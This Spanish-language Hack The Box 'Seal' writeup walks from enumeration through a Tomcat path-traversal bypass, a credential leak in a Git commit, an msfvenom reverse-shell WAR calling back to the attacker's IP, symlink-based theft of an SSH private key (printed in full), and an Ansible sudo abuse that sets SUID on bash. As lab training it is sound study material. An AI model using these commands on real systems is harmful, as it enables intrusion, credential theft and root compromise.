Table of Contents
Hack The Box: Seal Writeup
Welcome to my detailed writeup of the medium difficulty machine “Seal” on Hack The Box. This writeup will cover the steps taken to achieve initial foothold and escalation to root.
TCP Enumeration
1$ rustscan -a 10.129.95.190 --ulimit 5000 -g
210.129.95.190 -> [22,443,8080]
1$ nmap -p22,443,8080 -sCV 10.129.95.190
2Host is up (0.036s latency).
3
4PORT STATE SERVICE VERSION
522/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
6| ssh-hostkey:
7| 3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
8| 256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
9|_ 256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
10443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
11| tls-nextprotoneg:
12|_ http/1.1
13|_http-server-header: nginx/1.18.0 (Ubuntu)
14| tls-alpn:
15|_ http/1.1
16|_ssl-date: TLS randomness does not represent time
17|_http-title: Seal Market
18| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
19| Not valid before: 2021-05-05T10:24:03
20|_Not valid after: 2022-05-05T10:24:03
218080/tcp open http-proxy
22| http-auth:
23| HTTP/1.1 401 Unauthorized\x0D
24|_ Server returned status 401 but no WWW-Authenticate header.
25| fingerprint-strings:
26| FourOhFourRequest:
27| HTTP/1.1 401 Unauthorized
28| Date: Sat, 31 Aug 2024 18:12:15 GMT
29| Set-Cookie: JSESSIONID=node014pxwi17vb5yf1qqcvvqltsts32.node0; Path=/; HttpOnly
30| Expires: Thu, 01 Jan 1970 00:00:00 GMT
31| Content-Type: text/html;charset=utf-8
32| Content-Length: 0
33| GetRequest:
34| HTTP/1.1 401 Unauthorized
35| Date: Sat, 31 Aug 2024 18:12:14 GMT
36| Set-Cookie: JSESSIONID=node01ewvnbws9hp3gt80lfdge53rt0.node0; Path=/; HttpOnly
37| Expires: Thu, 01 Jan 1970 00:00:00 GMT
38| Content-Type: text/html;charset=utf-8
39| Content-Length: 0
40| HTTPOptions:
41| HTTP/1.1 200 OK
42| Date: Sat, 31 Aug 2024 18:12:15 GMT
43| Set-Cookie: JSESSIONID=node05dbrzz6daw9s195w6gafkut001.node0; Path=/; HttpOnly
44| Expires: Thu, 01 Jan 1970 00:00:00 GMT
45| Content-Type: text/html;charset=utf-8
46| Allow: GET,HEAD,POST,OPTIONS
47| Content-Length: 0
48| RPCCheck:
49| HTTP/1.1 400 Illegal character OTEXT=0x80
50| Content-Type: text/html;charset=iso-8859-1
51| Content-Length: 71
52| Connection: close
53| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
54| RTSPRequest:
55| HTTP/1.1 505 Unknown Version
56| Content-Type: text/html;charset=iso-8859-1
57| Content-Length: 58
58| Connection: close
59| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
60| Socks4:
61| HTTP/1.1 400 Illegal character CNTL=0x4
62| Content-Type: text/html;charset=iso-8859-1
63| Content-Length: 69
64| Connection: close
65| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
66| Socks5:
67| HTTP/1.1 400 Illegal character CNTL=0x5
68| Content-Type: text/html;charset=iso-8859-1
69| Content-Length: 69
70| Connection: close
71|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
72|_http-title: Site doesn't have a title (text/html;charset=utf-8).
731 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
74SF-Port8080-TCP:V=7.94SVN%I=7%D=8/31%Time=66D3791C%P=x86_64-pc-linux-gnu%r
75SF:(GetRequest,F4,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Sat,\x2031
76SF:\x20Aug\x202024\x2018:12:14\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node01e
77SF:wvnbws9hp3gt80lfdge53rt0\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20
78SF:Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/h
79SF:tml;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,108,"
80SF:HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2031\x20Aug\x202024\x2018:12:1
81SF:5\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node05dbrzz6daw9s195w6gafkut001\.
82SF:node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\
83SF:x2000:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nAllow
84SF::\x20GET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ
85SF:est,AD,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x20text
86SF:/html;charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\x20clo
87SF:se\r\n\r\n<h1>Bad\x20Message\x20505</h1><pre>reason:\x20Unknown\x20Vers
88SF:ion</pre>")%r(FourOhFourRequest,F5,"HTTP/1\.1\x20401\x20Unauthorized\r\
89SF:nDate:\x20Sat,\x2031\x20Aug\x202024\x2018:12:15\x20GMT\r\nSet-Cookie:\x
90SF:20JSESSIONID=node014pxwi17vb5yf1qqcvvqltsts32\.node0;\x20Path=/;\x20Htt
91SF:pOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nCo
92SF:ntent-Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\r\n"
93SF:)%r(Socks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5\r\n
94SF:Content-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2069\
95SF:r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reaso
96SF:n:\x20Illegal\x20character\x20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1\.1\x
97SF:20400\x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/html
98SF:;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\
99SF:n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character
100SF:\x20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20char
101SF:acter\x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\
102SF:nContent-Length:\x2071\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Messag
103SF:e\x20400</h1><pre>reason:\x20Illegal\x20character\x20OTEXT=0x80</pre>");
104Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
105
106Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
107# Nmap done at Sat Aug 31 22:12:22 2024 -- 1 IP address (1 host up) scanned in 17.16 seconds
UDP Enumeration
1$ sudo nmap --top-ports 1500 --min-rate 5000 -n -Pn 10.129.95.190 -sU -oN allPorts.UDP
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-31 22:14 CEST
3Nmap scan report for 10.129.95.190
4Host is up (0.53s latency).
5Not shown: 1494 open|filtered udp ports (no-response)
6PORT STATE SERVICE
73664/udp closed ups-engine
85002/udp closed rfe
930718/udp closed unknown
1034433/udp closed unknown
1149193/udp closed unknown
1254321/udp closed bo2k
13
14Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds
Del escaneo inicial encontramos el dominio seal.htb, lo añadimos al /etc/hosts
Podemos inspeccionar el certificado SSL y encontramos que está emitido por una CA registrada al correo electrónico admin@seal.htb
1$ openssl s_client -showcerts -connect 10.129.95.190:443
HTTPS Enumeration
whatweb no reporta nada interesante.
1$ whatweb https://seal.htb
2https://seal.htb [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[admin@seal.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.129.95.190], JQuery[3.0.0], Script, Title[Seal Market], X-UA-Compatible[IE=edge], nginx[1.18.0]
Así se ve el sitio web, es un sitio web estático.
Anteriormente se nos reportaba un nginx pero también detectamos que se está utilizando un Tomcat por detrás. Por lo cual debe de existir una aplicación Java.
Fuzzeando el sitio web encontramos una ruta /manager/html típica de tomcat pero no nos pide ninguna autenticación.
Podemos hacer un pequeño path traversal ya que existen algunas aplicaciones Tomcat que están mal configuradas y nos permite acceder a recursos protegidos con el path /..;/
Probando credenciales por defecto no conseguí nada.
8080/TCP Enumeration
Vemos una instancia de GitBucket
Podemos crearnos una cuenta bajo /register
Una vez iniciado sesión vemos dos repositorios.
Vemos una Issue abierta donde descubrimos dos usuarios, alex y luis
Revisando la configuración de nginx a través del repositorio vemos las rutas /manager/html que ya hemos visto, /admin/dashboard que revisando el código vemos que nos redirecciona a un sitio estático y /host-manager/html
Aprovechando el Path Traversal encontrado anteriormente podemos ver el panel y efectivamente es estático.
Y la ruta /host-manager/html es correspondiente al Tomcat Virtual Host Manager
Information Leakage
Vemos un commit que pone Adding tomcat configuration y acto seguido otro commit actualizandola.
Investigando este commit, en el archivo tomcat-users.xml nos encontramos una credencial.
Aprovechando esta fuga de información en el commit mas el Path Traversal podemos iniciar sesión en el panel de tomcat.
También en el VHost manager.
Foothold
Ahora que tenemos acceso al panel de Tomcat podemos hacer la típica intrusión generando un .war malicioso y consiguiendo una consola.
Generamos el .war malicioso con msfvenom
1$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.66 LPORT=443 -f war -o revshell.war
2Payload size: 1104 bytes
3Final size of war file: 1104 bytes
4Saved as: revshell.war
Al intentar subir el .war vemos lo siguiente.
Probé con esta manera para hacer el Path Traversal.
Y de esta manera si que podemos subir el .war malicioso.
Ahora simplemente nos ponemos en escucha con pwncat-cs por el puerto 443.
1$ sudo pwncat-cs -lp 443
Y accedemos a https://seal.htb/revshell/
Y vemos que ganamos acceso a la máquina.
1(remote) tomcat@seal:/var/lib/tomcat9$ whoami
2tomcat
User Pivoting
Vemos al usuario luis
1(remote) tomcat@seal:/var/lib/tomcat9$ cat /etc/passwd | grep bash
2root:x:0:0:root:/root:/bin/bash
3luis:x:1000:1000:,,,:/home/luis:/bin/bash
Podemos probar la credencial que tenemos para luis pero no hay suerte.
1(remote) tomcat@seal:/var/lib/tomcat9$ su luis
2Password:
3su: Authentication failure
Al pasar el linpeas.sh vemos lo siguiente.
Parece que hay una especie de servicio de backup que realiza backups en /opt/backups
1(remote) tomcat@seal:/opt/backups$ ls -la
2total 16
3drwxr-xr-x 4 luis luis 4096 Aug 31 19:09 .
4drwxr-xr-x 3 root root 4096 May 7 2021 ..
5drwxrwxr-x 2 luis luis 4096 Aug 31 19:10 archives
6drwxrwxr-x 2 luis luis 4096 May 7 2021 playbook
Además vemos un directorio playbook que contiene un fichero run.yml
1- hosts: localhost
2 tasks:
3 - name: Copy Files
4 synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
5 - name: Server Backups
6 archive:
7 path: /opt/backups/files/
8 dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
9 - name: Clean
10 file:
11 state: absent
12 path: /opt/backups/files/Este archivo run.yml es un playbook de Ansible que realiza tres tareas principales.
Copiar archivos:
- Copia el contenido del directorio
/var/lib/tomcat9/webapps/ROOT/admin/dashboardal directorio/opt/backups/filesen el mismo sistema. - Si hay enlaces simbólicos en el directorio de origen, también se copian (gracias a
copy_links=yes).
- Copia el contenido del directorio
Hacer un backup:
- Crea un archivo comprimido (formato
.gz) con el contenido del directorio/opt/backups/files/. - El archivo de backup se guarda en
/opt/backups/archives/con un nombre que incluye la fecha y la hora actuales (utilizando las variables{{ansible_date_time.date}}y{{ansible_date_time.time}}).
- Crea un archivo comprimido (formato
Limpiar:
- Elimina el directorio
/opt/backups/files/y su contenido.
- Elimina el directorio
Viendo la opción de copy_links podríamos crear un enlace simbólico haciendo referencia a la clave privada de luis y ver si luego podemos leerla cuando se haga el backup.
Vemos que tenemos permiso de escritura en el directorio uploads
1(remote) tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ls -la
2total 100
3drwxr-xr-x 7 root root 4096 May 7 2021 .
4drwxr-xr-x 3 root root 4096 May 6 2021 ..
5drwxr-xr-x 5 root root 4096 Mar 7 2015 bootstrap
6drwxr-xr-x 2 root root 4096 Mar 7 2015 css
7drwxr-xr-x 4 root root 4096 Mar 7 2015 images
8-rw-r--r-- 1 root root 71744 May 6 2021 index.html
9drwxr-xr-x 4 root root 4096 Mar 7 2015 scripts
10drwxrwxrwx 2 root root 4096 May 7 2021 uploads
1(remote) tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ cd uploads
2(remote) tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ ls
3(remote) tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ touch test
4(remote) tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ ls
5test
Creamos el enlace simbólico
1(remote) tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ ln -s /home/luis/.ssh/id_rsa id_rsa
2(remote) tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads$ ls -la
3total 8
4drwxrwxrwx 2 root root 4096 Aug 31 19:14 .
5drwxr-xr-x 7 root root 4096 May 7 2021 ..
6lrwxrwxrwx 1 tomcat tomcat 22 Aug 31 19:14 id_rsa -> /home/luis/.ssh/id_rsa
7-rw-r----- 1 tomcat tomcat 0 Aug 31 19:13 test
Cuando se hace el backup, nos copiamos el comprimido.
1(remote) tomcat@seal:/opt/backups/archives$ cp backup-2024-08-31-19:16:31.gz /tmp/2.gz
Lo extraemos.
1(remote) tomcat@seal:/tmp$ tar -xvf 2.gz
2dashboard/
3dashboard/scripts/
4dashboard/images/
5dashboard/css/
6dashboard/uploads/
7dashboard/bootstrap/
8dashboard/index.html
9dashboard/scripts/flot/
10dashboard/scripts/datatables/
11dashboard/scripts/jquery-ui-1.10.1.custom.min.js
12dashboard/scripts/common.js
13dashboard/scripts/jquery-1.9.1.min.js
14dashboard/scripts/flot/jquery.flot.resize.js
15dashboard/scripts/flot/jquery.flot.pie.js
16dashboard/scripts/flot/jquery.flot.js
17dashboard/scripts/datatables/jquery.dataTables.js
18dashboard/images/jquery-ui/
19dashboard/images/icons/
20dashboard/images/img.jpg
21dashboard/images/user.png
22dashboard/images/bg.png
23dashboard/images/jquery-ui/picker.png
24dashboard/images/icons/css/
25dashboard/images/icons/font/
26dashboard/images/icons/css/font-awesome.css
27dashboard/images/icons/font/fontawesome-webfont3294.ttf
28dashboard/images/icons/font/fontawesome-webfontd41d.eot
29dashboard/images/icons/font/fontawesome-webfont3294.eot
30dashboard/images/icons/font/fontawesome-webfont3294.woff
31dashboard/css/theme.css
32dashboard/uploads/id_rsa
33dashboard/bootstrap/css/
34dashboard/bootstrap/js/
35dashboard/bootstrap/img/
36dashboard/bootstrap/css/bootstrap-responsive.min.css
37dashboard/bootstrap/css/bootstrap.min.css
38dashboard/bootstrap/js/bootstrap.min.js
39dashboard/bootstrap/img/glyphicons-halflings.png
40dashboard/bootstrap/img/glyphicons-halflings-white.png
Y podemos leer la clave privada.
1(remote) tomcat@seal:/tmp/dashboard/uploads$ cat id_rsa
2-----BEGIN OPENSSH PRIVATE KEY-----
3b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
4NhAAAAAwEAAQAAAYEAs3kISCeddKacCQhVcpTTVcLxM9q2iQKzi9hsnlEt0Z7kchZrSZsG
5DkID79g/4XrnoKXm2ud0gmZxdVJUAQ33Kg3Nk6czDI0wevr/YfBpCkXm5rsnfo5zjEuVGo
6MTJhNZ8iOu7sCDZZA6sX48OFtuF6zuUgFqzHrdHrR4+YFawgP8OgJ9NWkapmmtkkxcEbF4
7n1+v/l+74kEmti7jTiTSQgPr/ToTdvQtw12+YafVtEkB/8ipEnAIoD/B6JOOd4pPTNgX8R
8MPWH93mStrqblnMOWJto9YpLxhM43v9I6EUje8gp/EcSrvHDBezEEMzZS+IbcP+hnw5ela
9duLmtdTSMPTCWkpI9hXHNU9njcD+TRR/A90VHqdqLlaJkgC9zpRXB2096DVxFYdOLcjgeN
103rcnCAEhQ75VsEHXE/NHgO8zjD2o3cnAOzsMyQrqNXtPa+qHjVDch/T1TjSlCWxAFHy/OI
11PxBupE/kbEoy1+dJHuR+gEp6yMlfqFyEVhUbDqyhAAAFgOAxrtXgMa7VAAAAB3NzaC1yc2
12EAAAGBALN5CEgnnXSmnAkIVXKU01XC8TPatokCs4vYbJ5RLdGe5HIWa0mbBg5CA+/YP+F6
1356Cl5trndIJmcXVSVAEN9yoNzZOnMwyNMHr6/2HwaQpF5ua7J36Oc4xLlRqDEyYTWfIjru
147Ag2WQOrF+PDhbbhes7lIBasx63R60ePmBWsID/DoCfTVpGqZprZJMXBGxeJ9fr/5fu+JB
15JrYu404k0kID6/06E3b0LcNdvmGn1bRJAf/IqRJwCKA/weiTjneKT0zYF/ETD1h/d5kra6
16m5ZzDlibaPWKS8YTON7/SOhFI3vIKfxHEq7xwwXsxBDM2UviG3D/oZ8OXpWnbi5rXU0jD0
17wlpKSPYVxzVPZ43A/k0UfwPdFR6nai5WiZIAvc6UVwdtPeg1cRWHTi3I4Hjd63JwgBIUO+
18VbBB1xPzR4DvM4w9qN3JwDs7DMkK6jV7T2vqh41Q3If09U40pQlsQBR8vziD8QbqRP5GxK
19MtfnSR7kfoBKesjJX6hchFYVGw6soQAAAAMBAAEAAAGAJuAsvxR1svL0EbDQcYVzUbxsaw
20MRTxRauAwlWxXSivmUGnJowwTlhukd2TJKhBkPW2kUXI6OWkC+it9Oevv/cgiTY0xwbmOX
21AMylzR06Y5NItOoNYAiTVux4W8nQuAqxDRZVqjnhPHrFe/UQLlT/v/khlnngHHLwutn06n
22bupeAfHqGzZYJi13FEu8/2kY6TxlH/2WX7WMMsE4KMkjy/nrUixTNzS+0QjKUdvCGS1P6L
23hFB+7xN9itjEtBBiZ9p5feXwBn6aqIgSFyQJlU4e2CUFUd5PrkiHLf8mXjJJGMHbHne2ru
24p0OXVqjxAW3qifK3UEp0bCInJS7UJ7tR9VI52QzQ/RfGJ+CshtqBeEioaLfPi9CxZ6LN4S
251zriasJdAzB3Hbu4NVVOc/xkH9mTJQ3kf5RGScCYablLjUCOq05aPVqhaW6tyDaf8ob85q
26/s+CYaOrbi1YhxhOM8o5MvNzsrS8eIk1hTOf0msKEJ5mWo+RfhhCj9FTFSqyK79hQBAAAA
27wQCfhc5si+UU+SHfQBg9lm8d1YAfnXDP5X1wjz+GFw15lGbg1x4YBgIz0A8PijpXeVthz2
28ib+73vdNZgUD9t2B0TiwogMs2UlxuTguWivb9JxAZdbzr8Ro1XBCU6wtzQb4e22licifaa
29WS/o1mRHOOP90jfpPOby8WZnDuLm4+IBzvcHFQaO7LUG2oPEwTl0ii7SmaXdahdCfQwkN5
30NkfLXfUqg41nDOfLyRCqNAXu+pEbp8UIUl2tptCJo/zDzVsI4AAADBAOUwZjaZm6w/EGP6
31KX6w28Y/sa/0hPhLJvcuZbOrgMj+8FlSceVznA3gAuClJNNn0jPZ0RMWUB978eu4J3se5O
32plVaLGrzT88K0nQbvM3KhcBjsOxCpuwxUlTrJi6+i9WyPENovEWU5c79WJsTKjIpMOmEbM
33kCbtTRbHtuKwuSe8OWMTF2+Bmt0nMQc9IRD1II2TxNDLNGVqbq4fhBEW4co1X076CUGDnx
345K5HCjel95b+9H2ZXnW9LeLd8G7oFRUQAAAMEAyHfDZKku36IYmNeDEEcCUrO9Nl0Nle7b
35Vd3EJug4Wsl/n1UqCCABQjhWpWA3oniOXwmbAsvFiox5EdBYzr6vsWmeleOQTRuJCbw6lc
36YG6tmwVeTbhkycXMbEVeIsG0a42Yj1ywrq5GyXKYaFr3DnDITcqLbdxIIEdH1vrRjYynVM
37ueX7aq9pIXhcGT6M9CGUJjyEkvOrx+HRD4TKu0lGcO3LVANGPqSfks4r5Ea4LiZ4Q4YnOJ
38u8KqOiDVrwmFJRAAAACWx1aXNAc2VhbAE=
39-----END OPENSSH PRIVATE KEY-----
Ahora le podemos dar los permisos adecuados a la clave privada.
1$ chmod 600 id_rsa.luis
Y conectarnos vía SSH como luis
1$ ssh -i id_rsa.luis luis@seal.htb
2Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
3
4 * Documentation: https://help.ubuntu.com
5 * Management: https://landscape.canonical.com
6 * Support: https://ubuntu.com/advantage
7
8 System information as of Sat 31 Aug 2024 07:20:35 PM UTC
9
10 System load: 0.0
11 Usage of /: 47.0% of 9.58GB
12 Memory usage: 29%
13 Swap usage: 0%
14 Processes: 170
15 Users logged in: 0
16 IPv4 address for eth0: 10.129.95.190
17 IPv6 address for eth0: dead:beef::250:56ff:fe94:47b7
18
19
2022 updates can be applied immediately.
2115 of these updates are standard security updates.
22To see these additional updates run: apt list --upgradable
23
24
25The list of available updates is more than a week old.
26To check for new updates run: sudo apt update
27Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
28
29
30Last login: Sat Aug 31 19:19:41 2024 from 127.0.0.1
31luis@seal:~$ id
32uid=1000(luis) gid=1000(luis) groups=1000(luis)
Podemos leer la flag de usuario.
1luis@seal:~$ cat user.txt
232a75c21bc5e8cf...
Privilege Escalation
Luis puede ejecutar como el usuario que quiera y sin contraseña ansible-playbook *
1luis@seal:~$ sudo -l
2Matching Defaults entries for luis on seal:
3 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
4
5User luis may run the following commands on seal:
6 (ALL) NOPASSWD: /usr/bin/ansible-playbook *
Podemos utilizar esto para crear un playbook malicioso para ejecutar un comando a nivel de sistema y de esta forma escalar privilegios.
Podemos ver los permisos de /bin/bash
1luis@seal:~$ ls -la /bin/bash
2-rwxr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash
Podemos crear un pequeño playbook para ejecutar el comando chmod u+s /bin/bash a nivel de sistema y asignar el bit SUID a /bin/bash para poder lanzarnos una bash como root
1---
2- hosts: localhost
3 become: yes
4 tasks:
5 - name: Establecer el bit SUID en /bin/bash
6 command: chmod u+s /bin/bashY ahora simplemente queda ejecutarlo.
1luis@seal:~$ sudo /usr/bin/ansible-playbook test.yml
2[WARNING]: provided hosts list is empty, only localhost is available. Note that the
3implicit localhost does not match 'all'
4
5PLAY [localhost] *************************************************************************
6
7TASK [Gathering Facts] *******************************************************************
8ok: [localhost]
9
10TASK [Establecer el bit SUID en /bin/bash] ***********************************************
11[WARNING]: Consider using the file module with mode rather than running 'chmod'. If you
12need to use command because file is insufficient you can add 'warn: false' to this
13command task or set 'command_warnings=False' in ansible.cfg to get rid of this message.
14changed: [localhost]
15
16PLAY RECAP *******************************************************************************
17localhost : ok=2 changed=1 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
18
19luis@seal:~$ ls -la /bin/bash
20-rwsr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash
Y ahora con bash -p vemos que conseguimos una bash con el euid 0, es decir, root
1luis@seal:~$ bash -p
2bash-5.0# id
3uid=1000(luis) gid=1000(luis) euid=0(root) groups=1000(luis)
Y ya podemos dirigirnos a /root y leer la flag de root
1bash-5.0# cat root.txt
2a7eea3c65bacb...
¡Y ya estaría!
Happy Hacking! 🚀
#HackTheBox #Seal #Writeup #Cybersecurity #Penetration Testing #CTF #Reverse Shell #Privilege Escalation #RCE #Exploit #Linux #HTTPS Enumeration #GitBucket Enumeration #Information Leakage #Path Traversal #Evil WAR #Abusing Ansible #User Pivoting #Abusing Ansible-Playbook